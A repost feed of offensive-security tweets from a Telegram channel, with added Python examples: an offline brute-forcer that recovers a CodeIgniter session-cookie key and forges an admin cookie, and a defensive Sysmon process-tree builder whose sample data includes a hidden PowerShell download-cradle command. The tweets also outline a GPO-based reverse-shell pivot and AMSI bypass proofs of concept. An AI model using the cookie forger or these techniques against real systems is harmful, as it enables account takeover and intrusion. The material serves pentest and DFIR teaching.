Offensive Xwitter – Telegram
Offensive Xwitter
~$ socat TWITTER-LISTEN:443,fork,reuseaddr TELEGRAM:1.3.3.7:31337

Disclaimer: https://news.1rj.ru/str/OffensiveTwitter/546
😈 [ podalirius_, Podalirius ]

I published a tool to #bruteforce the key of @CodeIgniter's session #cookies, in order to sign arbitrary attacker-controlled cookies🍪

I wrote this tool for a use case encountered in #bugbounty recently, but we can find this in #pentest too.

https://t.co/7JIiYQskoG

🔗 https://github.com/p0dalirius/CodeIgniter-session-unsign

🐥 [ tweet ]
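The tool linked above brute-forces the key that signs CodeIgniter session cookies. As an added illustration (not p0dalirius's code), here is the shape of that attack against a cookie laid out as serialized payload followed by md5(payload + encryption_key), the layout CodeIgniter 2.x used for unencrypted cookie sessions; the key, cookie and wordlist are constructed, and whether a given target's cookie uses this layout must be checked against the framework version in play. The payload itself is cleartext, so the 32-character digest is the only thing the client cannot rewrite, which is why recovering the key is enough to forge a session:

```python
import hashlib
import hmac

# Constructed example. Assumed layout (CodeIgniter 2.x unencrypted cookie session):
#     cookie = php_serialize(session) + md5(php_serialize(session) + encryption_key)
# Check the target's framework version before assuming this is what it emits.

KEY = "mysecretkey"  # constructed weak key, the thing being recovered

# Constructed wordlist. The empty string goes first on purpose: the stock
# config.php ships with $config['encryption_key'] = '' and is often left that way.
WORDLIST = ["", "changeme", "secret", "mysecretkey", "password123"]


def php_serialize(data: dict) -> str:
    """Serialize a flat dict of str/int/bool values the way PHP's serialize() does."""
    parts = []
    for key, value in data.items():
        parts.append(f's:{len(key.encode())}:"{key}";')
        if isinstance(value, bool):          # bool before int: bool is an int subclass
            parts.append(f"b:{int(value)};")
        elif isinstance(value, int):
            parts.append(f"i:{value};")
        else:
            parts.append(f's:{len(value.encode())}:"{value}";')
    return f"a:{len(data)}:{{{''.join(parts)}}}"


def sign(payload: str, key: str) -> str:
    """Server side: append md5(payload + key) as the tamper check."""
    return payload + hashlib.md5((payload + key).encode()).hexdigest()


def split_cookie(cookie: str):
    """The digest is always the trailing 32 hex characters."""
    return cookie[:-32], cookie[-32:]


def verify(cookie: str, key: str) -> bool:
    payload, digest = split_cookie(cookie)
    expected = hashlib.md5((payload + key).encode()).hexdigest()
    return hmac.compare_digest(expected, digest)


def bruteforce_key(cookie: str, wordlist):
    """Offline: one md5 per candidate, no requests to the target. Returns the key or None."""
    for candidate in wordlist:
        if verify(cookie, candidate):
            return candidate
    return None


def forge_cookie(session: dict, key: str) -> str:
    """With the key recovered, sign any session content the application will trust."""
    return sign(php_serialize(session), key)


# A cookie as the (constructed) victim application would have issued it
COOKIE = sign(php_serialize({"user_id": 1337, "is_admin": 0}), KEY)

if __name__ == "__main__":
    found = bruteforce_key(COOKIE, WORDLIST)
    print("recovered key:", repr(found))
    if found is not None:
        print("forged admin cookie:", forge_cookie({"user_id": 1, "is_admin": 1}, found))
```

On a real engagement the cookie comes from your own low-privilege session and the wordlist from the usual key lists; an unsalted MD5 per candidate means even a large list is a matter of seconds.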
😈 [ 0gtweet, Grzegorz Tworek ]

Is #SysInternals Sysmon good for discovering the full historical process tree? Of course! Bored with the manual process, I have created a simple (but fully working) PowerShell script displaying the tree in a nicely walkable form. Enjoy: https://t.co/eZFIDBT2lN

🔗 https://github.com/gtworek/PSBits/blob/master/DFIR/GetSysmonTree.ps1

🐥 [ tweet ]
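The script above rebuilds the tree from the live Sysmon log in PowerShell. As an added example (not Grzegorz Tworek's code), the core of that reconstruction in Python over constructed Event ID 1 (ProcessCreate) records, using the EventData field names Sysmon emits; how the records are exported (the Get-WinEvent call in the comment) is an assumption about the collection step, not part of the page. The point a DFIR analyst cares about is the join key: ProcessGuid/ParentProcessGuid rather than PID, because Windows reuses PIDs and the constructed data includes exactly that case.

```python
from collections import defaultdict

# Constructed Sysmon Event ID 1 records, reduced to the EventData fields the tree needs.
# On a real host they could be pulled with
#   Get-WinEvent -LogName 'Microsoft-Windows-Sysmon/Operational' -FilterXPath '*[System[EventID=1]]'
# and fed in with these same field names. Two cmd.exe entries share PID 3333 on purpose:
# the first exited and Windows reused the PID, which is why the GUID is the join key.
EVENTS = [
    {"UtcTime": "2022-07-01 09:00:00.000", "ProcessGuid": "{G-0001}", "ProcessId": 1234,
     "Image": "C:\\Windows\\explorer.exe", "CommandLine": "C:\\Windows\\Explorer.EXE",
     "ParentProcessGuid": "{G-0000}", "ParentProcessId": 1000},   # parent not in the log
    {"UtcTime": "2022-07-01 09:05:00.000", "ProcessGuid": "{G-0002}", "ProcessId": 2222,
     "Image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
     "CommandLine": '"WINWORD.EXE" invoice.docm',
     "ParentProcessGuid": "{G-0001}", "ParentProcessId": 1234},
    {"UtcTime": "2022-07-01 09:05:10.000", "ProcessGuid": "{G-0003}", "ProcessId": 3333,
     "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe /c whoami",
     "ParentProcessGuid": "{G-0002}", "ParentProcessId": 2222},
    {"UtcTime": "2022-07-01 09:06:00.000", "ProcessGuid": "{G-0004}", "ProcessId": 3333,
     "Image": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "cmd.exe /c powershell -nop -w hidden -c <cradle>",
     "ParentProcessGuid": "{G-0002}", "ParentProcessId": 2222},
    {"UtcTime": "2022-07-01 09:06:01.000", "ProcessGuid": "{G-0005}", "ProcessId": 4444,
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell -nop -w hidden -c <cradle>",
     "ParentProcessGuid": "{G-0004}", "ParentProcessId": 3333},
]


def build_tree(events):
    """Return (roots, children): children maps a ProcessGuid to its child events in
    creation order; roots are events whose parent GUID never appears in the log
    (created before Sysmon was installed, or simply not captured)."""
    by_guid = {e["ProcessGuid"]: e for e in events}
    children = defaultdict(list)
    roots = []
    for e in sorted(events, key=lambda e: e["UtcTime"]):
        if e["ParentProcessGuid"] in by_guid:
            children[e["ParentProcessGuid"]].append(e)
        else:
            roots.append(e)
    return roots, children


def render_tree(events):
    """Indented one-line-per-process view; returns the lines so callers can grep or assert."""
    roots, children = build_tree(events)
    lines = []

    def walk(e, depth):
        name = e["Image"].rsplit("\\", 1)[-1]
        lines.append("  " * depth + f"{name} (PID {e['ProcessId']}) {e['CommandLine']}")
        for child in children[e["ProcessGuid"]]:
            walk(child, depth + 1)

    for root in roots:
        walk(root, 0)
    return lines


def ancestry(events, guid):
    """Walk up from one suspicious process to the top of what the log captured."""
    by_guid = {e["ProcessGuid"]: e for e in events}
    chain = []
    while guid in by_guid:
        chain.append(by_guid[guid])
        guid = by_guid[guid]["ParentProcessGuid"]
    return list(reversed(chain))


if __name__ == "__main__":
    print("\n".join(render_tree(EVENTS)))
    print(" -> ".join(e["Image"].rsplit("\\", 1)[-1] for e in ancestry(EVENTS, "{G-0005}")))
```

Keying on PID would attach the powershell.exe to whichever cmd.exe happened to carry PID 3333 at lookup time; keying on ProcessGuid attaches it to the instance that actually spawned it, which is what the GUIDs exist for.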
👹 [ snovvcrash, sn🥶vvcr💥sh ]

[#HackStory 🧵] (1/4) Here’s a generic case of reaching a locked-down PC from a firewalled segment in AD. The background is: 172.16.66.6 (the target) can talk to 192.168.1.11 (a PWNed server) but not vice versa and to no one else in the foreseeable network 👀

#ad #pentest

🐥 [ tweet ]
👹 [ snovvcrash, sn🥶vvcr💥sh ]

(2/4) Being a DA, an adversary can create an evil GPO that will coerce Immediate Scheduled Task execution on the target. The task downloads and executes a PS cradle pointing to the PWNed server. Sure, there’re fancy (py|Sharp)GPOAbuse, etc… But when it’s a pentest, who cares 😒

🐥 [ tweet ]
👹 [ snovvcrash, sn🥶vvcr💥sh ]

(3/4) Meanwhile, some v4tov4 port proxies are configured on the pivot point by the adversary via netsh 😈

🐥 [ tweet ]
👹 [ snovvcrash, sn🥶vvcr💥sh ]

(4/4) After 90 to 120 minutes the GPO gets applied and the adversary receives a reverse shell / C2 agent on his box with a further ability to spawn a reverse SOCKS proxy 🎉

🐥 [ tweet ]
👹 [ snovvcrash, sn🥶vvcr💥sh ]

(5/4) Last but not least, GPOs are not the only way to coerce job execution on a group of targets. There’re also some lovely control centers that some commercial AV/EDR developers gently provide pentesters with 🤫

🐥 [ tweet ]
😈 [ mariuszbit, Mariusz Banach ]

💎 Can't count in how many Active Directory audits this monstrous Cypher query helped me swiftly collect stats of a #BloodHound collection!

Simply Find & Replace "contoso.com" w/ your target domain aaaand you have it

https://t.co/2ChJ1n7Qzo

Helpful? Lemme know!💀

🔗 https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/red-teaming/bloodhound/Handy-BloodHound-Cypher-Queries.md

🐥 [ tweet ]
😈 [ 0xdf_, 0xdf ]

Undetected from @hackthebox_eu has me following in the steps of a previous attacker. There's an insecure PHP module, reversing a malicious kernel exploit and a backdoored sshd. Lots of Ghidra and understanding the attacker's steps and reusing them.

https://t.co/ItYsl66OVM

🔗 https://0xdf.gitlab.io/2022/07/02/htb-undetected.html

🐥 [ tweet ]
😈 [ HuskyHacksMK, Matt | HuskyHacks ]

the user said it looked safe🤦‍♂️ New PMAT bonus binary sample is up!

Difficulty: 🟨(med)

Available here (the labs are free and always will be):

https://t.co/YvMIe2D0DR

https://t.co/H9OaPt1XtJ

🔗 https://github.com/HuskyHacks/PMAT-labs/tree/main/labs/X-X.BonusBinaries/Dropper.installer.msi.malz
🔗 https://github.com/HuskyHacks/PMAT-labs

🐥 [ tweet ]
😈 [ cry__pto, Ammar Amer🇸🇾 ]

AMSI Unchained: Review of Known AMSI Bypass Techniques and Introducing a New One
https://t.co/uGpsIOkplP

🔗 https://www.blackhat.com/asia-22/briefings/schedule/#amsi-unchained-review-of-known-amsi-bypass-techniques-and-introducing-a-new-one-26120

🐥 [ tweet ]
😈 [ _nwodtuhs, Charlie Bromberg (Shutdown) ]

So apparently Microsoft ninja-patched two things lately in KB5014692 (06/14/2022)
1. ShadowCoerce (auth coercion abusing MS-FSRVP)
2. Self-RBCD trick to bypass limitations of Kerberos Constrained Delegation without Protocol Transition
Identified this with @Geiseric4 and @mkolsek

🐥 [ tweet ]
😈 [ ShitSecure, S3cur3Th1sSh1t ]

Just added the two new AMSI bypass PoCs via Provider Patching into my Amsi-Bypass-Powershell repo. Plus one PoC in Nim as a pull request for OffensiveNim:

https://t.co/CSqnqAuUaz

https://t.co/4W8RSPuzVG

Tested both, works perfectly fine. 👌

🔗 https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell
🔗 https://github.com/byt3bl33d3r/OffensiveNim/pull/51

🐥 [ tweet ]
😈 [ mrd0x, mr.d0x ]

Nothing too crazy in this blog post, but thought it may be useful for some people. Enjoy!

Social engineering your way into the network.

https://t.co/uPVBiClrXc

🔗 https://mrd0x.com/social-engineering-your-way-into-the-network/

🐥 [ tweet ]